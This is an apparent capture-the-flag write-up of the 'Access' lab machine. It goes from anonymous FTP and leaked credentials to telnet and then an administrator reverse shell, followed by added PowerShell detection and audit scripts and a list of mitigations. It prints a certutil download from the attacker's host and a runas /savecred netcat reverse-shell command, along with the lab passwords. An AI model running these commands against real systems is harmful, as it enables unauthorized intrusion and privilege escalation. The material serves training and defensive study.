Initial Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Telnet banner:
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login:
The web page is just a picture of a data center. Directory brute-forcing with ffuf returned only:
aspnet_client/system_web/
FTP allows anonymous access. The Backups directory contains a Microsoft Access database, "backup.mdb", and the Engineer directory contains a password-protected zip file, "Access Control.zip":
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:sweps): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 6.42 secs (860.3073 kB/s)
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete
backup.mdb contains a table named "auth user" with a password for the engineer: "access4u@security"
Opened the zip file using "access4u@security" as the password. It contained a .pst file, "Access Control.pst". Reading the file with readpst finds an email from John with the password for the security account:
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
The credentials do not work for FTP, so try them against the telnet service enumerated in the nmap scan:
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
Quick systeminfo:
Host Name: ACCESS
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84191
Original Install Date: 8/21/2018, 9:43:10 PM
System Boot Time: 10/15/2021, 11:13:38 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
[02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Checking for stored credentials:
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Stored Administrator credentials. We can use runas with the saved credential to run netcat and get a reverse shell.
Transfer netcat with certutil:
certutil -urlcache -f http://10.10.14.27:443/nc.exe nc.exe
Run it as administrator using the saved credentials:
C:\temp>C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "nc.exe 10.10.14.27 4444 -e cmd.exe"
Catch the shell:
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.98] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\administrator
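From the defender's side, both steps of the privilege escalation leave process-creation events behind. The following PowerShell is an added example, not part of the original writeup: it searches Security log event 4688 for the two commands used above (certutil -urlcache and runas /savecred). It assumes process-creation auditing with the "Include command line in process creation events" policy is enabled; without it the CommandLine field is empty and nothing matches. The $Hours parameter and the pattern names are my own.

```powershell
# Added example, not part of the original writeup: hunt the Security log for the two
# living-off-the-land commands used in this box (certutil -urlcache, runas /savecred).
# Assumes event 4688 is logged with command lines included; otherwise nothing matches.
param(
    [int]$Hours = 24
)

# -match is case-insensitive in PowerShell, so no (?i) is needed.
$patterns = @(
    @{ Name = 'certutil URL download';       Regex = 'certutil(\.exe)?\b.*-urlcache' },
    @{ Name = 'runas with saved credential'; Regex = 'runas(\.exe)?\b.*/savecred' }
)

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4688
    StartTime = (Get-Date).AddHours(-$Hours)
} -ErrorAction SilentlyContinue

foreach ($event in $events) {
    # Pull the named EventData fields (SubjectUserName, NewProcessName, CommandLine, ...)
    # out of the event XML into a hashtable.
    $xml  = [xml]$event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    $cmd = $data['CommandLine']
    if ([string]::IsNullOrWhiteSpace($cmd)) { continue }

    foreach ($p in $patterns) {
        if ($cmd -match $p.Regex) {
            # One record per hit; the User is whoever launched the process
            # (the low-privileged account, not the account runas switches to).
            [pscustomobject]@{
                Time        = $event.TimeCreated
                Detection   = $p.Name
                User        = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
                Process     = $data['NewProcessName']
                CommandLine = $cmd
            }
        }
    }
}
```

Run it on the server (or point Get-WinEvent at a forwarded log with -ComputerName) after enabling command-line logging. Note that for runas the interesting information is entirely in the command line: the process itself is the legitimate runas.exe, so a rule keyed only on the image name would miss it.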
Mitigations
Do not allow anonymous access to FTP shares. Disable telnet and use SSH. Do not store administrator credentials in Credential Manager: as demonstrated, anything saved there can be used by runas.exe /savecred to run commands as that account.
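Each of these mitigations can be checked on the host. The PowerShell below is an added example, not code from the original writeup: it audits a Windows server for the three weaknesses chained in this box. It assumes IIS keeps its FTP site settings in the standard applicationHost.config location (a parameter), that the Telnet server service is named TlntSvr, and that cmdkey /list only reports credentials saved by the user running the script.

```powershell
# Added example, not part of the original writeup: audit a Windows host for the three
# weaknesses chained in this box. Run from an elevated PowerShell on the server.
# Assumptions: standard applicationHost.config path, Telnet service name TlntSvr,
# and cmdkey only listing the current user's saved credentials.
param(
    [string]$AppHostConfig = "$env:windir\System32\inetsrv\config\applicationHost.config"
)

function Get-AccessAuditFindings {
    $findings = @()

    # 1. Anonymous authentication enabled on any IIS FTP site. The site-level setting
    #    is <site><ftpServer><security><authentication><anonymousAuthentication enabled="true"/>.
    if (Test-Path $AppHostConfig) {
        $cfg = [xml](Get-Content -Path $AppHostConfig)
        $anonSites = $cfg.SelectNodes(
            "//site[ftpServer/security/authentication/anonymousAuthentication[@enabled='true']]")
        foreach ($site in $anonSites) {
            $findings += "FTP: anonymous authentication enabled on site '$($site.name)'"
        }
    } else {
        $findings += "FTP: $AppHostConfig not found; IIS FTP may not be installed"
    }

    # 2. Telnet server present. Running or not, it should be removed in favour of SSH.
    $telnet = Get-Service -Name TlntSvr -ErrorAction SilentlyContinue
    if ($telnet) {
        $findings += "Telnet: TlntSvr service present, status $($telnet.Status)"
    }

    # 3. Credentials saved in Credential Manager, as shown by cmdkey /list.
    #    Each entry prints a "Target:" line followed later by a "User:" line.
    $target = $null
    foreach ($line in (cmdkey /list 2>$null)) {
        if ($line -match '^\s*Target:\s*(.+)$') { $target = $Matches[1].Trim(); continue }
        if ($line -match '^\s*User:\s*(.+)$') {
            $user = $Matches[1].Trim()
            $tag  = if ($user -match '(^|\\)Administrator$') { ' [PRIVILEGED]' } else { '' }
            $findings += "Stored credential: user '$user' for target '$target'$tag"
        }
    }

    return $findings
}

$result = Get-AccessAuditFindings
if ($result.Count -eq 0) { 'No findings' } else { $result }
```

Because Credential Manager is per user, the third check has to be run in the context of each account that can log in interactively (on this box, as the security user) to find the entry that made the escalation possible; running it only as an administrator would show nothing.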